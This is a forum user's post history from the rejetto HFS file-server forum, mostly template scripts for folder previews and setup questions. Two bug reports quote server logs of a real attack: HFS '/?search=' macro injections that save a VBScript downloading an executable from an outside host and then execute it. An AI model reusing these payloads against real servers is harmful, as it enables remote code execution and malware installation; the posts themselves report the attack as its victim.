rejetto forum

Show Posts

This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.


Messages - D

Pages: 1 2
1
HFS ~ HTTP File Server / Re: how to inline images in folder view
« on: April 21, 2022, 02:18:00 PM »
I have asked that before: https://rejetto.com/forum/index.php?topic=13479.0

Currently sticked with this code for diff template
Code: [Select]
[+]
<script>
function folderth(){
 [...document.querySelectorAll('#files a[href$="/"]')].forEach(item =>
 item.insertAdjacentHTML('afterbegin', '<img align=middle loading=lazy height=100% src='+item.href+'p.jpg>&nbsp;')
 )
}

if(!document.querySelector('main')) folderth()
else document.addEventListener('render', folderth)
</script>

2
HFS ~ HTTP File Server / How can I set up a simple redirect?
« on: March 23, 2022, 10:36:58 AM »
www.example.com/123/321.jpg
should be redirected to
www.example.com/000/321.jpg
and same with all files in /123/

is this possible?

3
It's easy:
1) Purchase domain (the one with cheapest renewal price I found is .download on porkbun)
2) Register on cloudflare, add your site, you will be given 2 nameservers
3) Go to your registrar where you purchased your domain and replace stock nameservers with cloudflare ones
Done.

Remember that cloudflare has 1 serious limit - users can't UPLOAD more than 100 mb to you.

4
HFS ~ HTTP File Server / Request login/password but accept any
« on: December 17, 2021, 12:11:13 PM »
Is this possible? I found option "accept any login for unprotected resources" but can't get it to work.

5
Bug reports / Re: Possible vulnerability
« on: December 14, 2021, 02:17:07 PM »
Here we go again, this time a little different:
Code: [Select]
14.12.2021 18:53:18 154.55.133.183:50174 Requested GET /?search=> dim bStrm: Set bStrm = createobject("Adodb.Stream")
> xHttp.Open "GET", "http://154.55.133.183/1.exe", False
> xHttp.Send
>
> with bStrm
>     .type = 1 '//binary
>     .open
>     .write xHttp.responseBody
>     .savetofile "C:\Users\Public\1.exe", 2 '//overwrite
> end with.}
14.12.2021 18:53:37 154.55.133.183:51758 Requested GET /?search=14.12.2021 18:54:03 154.55.133.183:53636 Requested GET /?search=14.12.2021 18:54:23 154.55.133.183:54859 Requested GET /?search=
Still nothing to worry about? Fixed in 2.3m?

6
Bug reports / Possible vulnerability
« on: December 11, 2021, 04:34:32 AM »
Since yesterday, someone is trying to pull code injection on me  :(  I'm on 2.3m
I'm not sure if I got hacked, I found no such files and my AV only quarantined the logs (scanned the link perhaps)
Is there a way to disable /?search functionality completely? I'm not using it anyway
Code: [Select]
10.12.2021 6:55:41 36.46.149.98 53274 Requested GET /?search= {.exec|C:\Users\Public\1.exe.}
10.12.2021 6:55:45 36.46.149.98 53556 Requested GET /?search= {.exec|C:\Users\Public\1.exe.}
10.12.2021 7:01:28 36.46.149.98 57608 Requested GET /
10.12.2021 7:01:28 36.46.149.98 57640 Requested GET /?search= {.save|C:\Users\Public\script.vbs|dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
> dim bStrm: Set bStrm = createobject("Adodb.Stream")
> xHttp.Open "GET", "http://103.144.2.108:8888/1.exe", False
> xHttp.Send
>
> with bStrm
>     .type = 1 '//binary
>     .open
>     .write xHttp.responseBody
>     .savetofile "C:\Users\Public\1.exe", 2 '//overwrite
> end with.}
Code: [Select]
10.12.2021 6:55:36 36.46.149.98 52884 Requested GET /
10.12.2021 6:55:37 36.46.149.98 52917 Requested GET /?search= {.save|C:\Users\Public\script.vbs|dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
> dim bStrm: Set bStrm = createobject("Adodb.Stream")
> xHttp.Open "GET", "http://103.144.2.108:8888/1.exe", False
> xHttp.Send
>
> with bStrm
>     .type = 1 '//binary
>     .open
>     .write xHttp.responseBody
>     .savetofile "C:\Users\Public\1.exe", 2 '//overwrite
> end with.}
Code: [Select]
11.12.2021 8:08:23 180.76.141.125 55846 Requested GET /
11.12.2021 8:08:24 180.76.141.125 55874 Requested GET /?search= {.save|C:\Users\Public\script.vbs|dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
> dim bStrm: Set bStrm = createobject("Adodb.Stream")
> xHttp.Open "GET", "http://103.144.2.108:8888/skol.exe", False
> xHttp.Send
>
> with bStrm
>     .type = 1 '//binary
>     .open
>     .write xHttp.responseBody
>     .savetofile "C:\Users\Public\skol.exe", 2 '//overwrite
> end with.}
11.12.2021 8:08:29 180.76.141.125 56070 Requested GET /?search= {.exec|C:\Users\Public\skol.exe.}
11.12.2021 8:08:32 180.76.141.125 56194 Requested GET /?search= {.exec|C:\Users\Public\skol.exe.}

7
HTML & templates / Re: Custom folder previews
« on: October 28, 2021, 06:31:11 AM »
The question is still relevant, can someone help, please?

8
HFS ~ HTTP File Server / Re: Why file system cleared?
« on: October 04, 2021, 07:25:25 AM »
Same, and my backup got overwritten by autosave :(

9
Bug reports / False errors on upload
« on: September 16, 2021, 10:54:00 PM »
They only appear in logs. I'm using HFS 2.3m

Code: [Select]
Upload failed for 20210916_221111.jpg: Not allowed.
Upload failed 20210916_221111.jpg
Upload failed for 20210916_221155.jpg: Not allowed.
Upload failed 20210916_221155.jpg
Upload failed for 20210916_221259.jpg: Not allowed.
Upload failed 20210916_221259.jpg
Requested POST /
Uploading 20210916_221111.jpg
Fully uploaded 20210916_221111.jpg - 71.2 K @ 316.4 KB/s
Uploading 20210916_221155.jpg
Fully uploaded 20210916_221155.jpg - 114.0 K @ 797.2 KB/s
Uploading 20210916_221259.jpg
Fully uploaded 20210916_221259.jpg - 163.8 K @ 1.1 MB/s

10
HTML & templates / Re: Custom folder previews
« on: September 15, 2021, 10:07:34 AM »
for hfs2.4
Thanks. How can I move these images into Hits column?

11
HTML & templates / Re: Custom folder previews
« on: September 14, 2021, 04:48:30 PM »
Okay, variant with images behind buttons:
Code: [Select]
[+]
<script>
var list=document.querySelectorAll("table#files>tbody>tr");
function changepic(a1)
{
  var alink=a1.querySelector("a");
  var adress=alink.getAttribute("href");
  if(adress.endsWith("/"))
  {
  adress+="p.jpg";
  var button=document.createElement("button");
  button.setAttribute("onclick","showPreview(this)");
  button.setAttribute("link",adress);
  button.setAttribute("type","button");
  a1.children[3].setAttribute("style","text-align:center");
  a1.children[3].appendChild(button);
  button.appendChild(document.createTextNode("Preview"));
  } 
}
list.forEach(changepic);
function showPreview(butt)
{
  butt.setAttribute("style","display:none");
  var par=butt.parentElement;
  var img=document.createElement("img");
  img.setAttribute("src",butt.getAttribute("link"));
  par.appendChild(img);
}
</script>

12
HTML & templates / Custom folder previews
« on: September 11, 2021, 09:36:48 PM »
Let's say I have following folders

New folder
New folder 2
New folder 3

Each contains a "p.jpg", I want to use these as folder preview.

The code for diff template I'm currently using:
Code: [Select]
[+]
<script>
var list=document.querySelectorAll("table#files>tbody>tr");
function changepic(a1)
{
  var alink=a1.querySelector("a");
  var adress=alink.getAttribute("href");
  if(adress.endsWith("/"))
  {
  adress+="p.jpg";
  var img=document.createElement("img");
  img.setAttribute("src",adress);
  img.setAttribute("onerror","this.style.display='none'");
  a1.children[3].appendChild(img);
  }
}
list.forEach(changepic);
</script>
eats too much cpu if there are too many folders. Because script doesn't check if p.jpg is actually present in folder

How can I fix it? Thanks in advance.

13
HFS ~ HTTP File Server / Re: about freedns?
« on: June 17, 2021, 11:41:51 AM »
Freedns only work for routers doesn't it? You need to configure it there. Or try duckdns, it has a windows gui app

14
HFS ~ HTTP File Server / Re: Is there a way to add login message?
« on: May 29, 2021, 03:56:38 AM »
Yes that's what I was looking for, many thanks.

15
HFS ~ HTTP File Server / Is there a way to add login message?
« on: May 28, 2021, 02:14:30 AM »
Like in attachment.

Pages: 1 2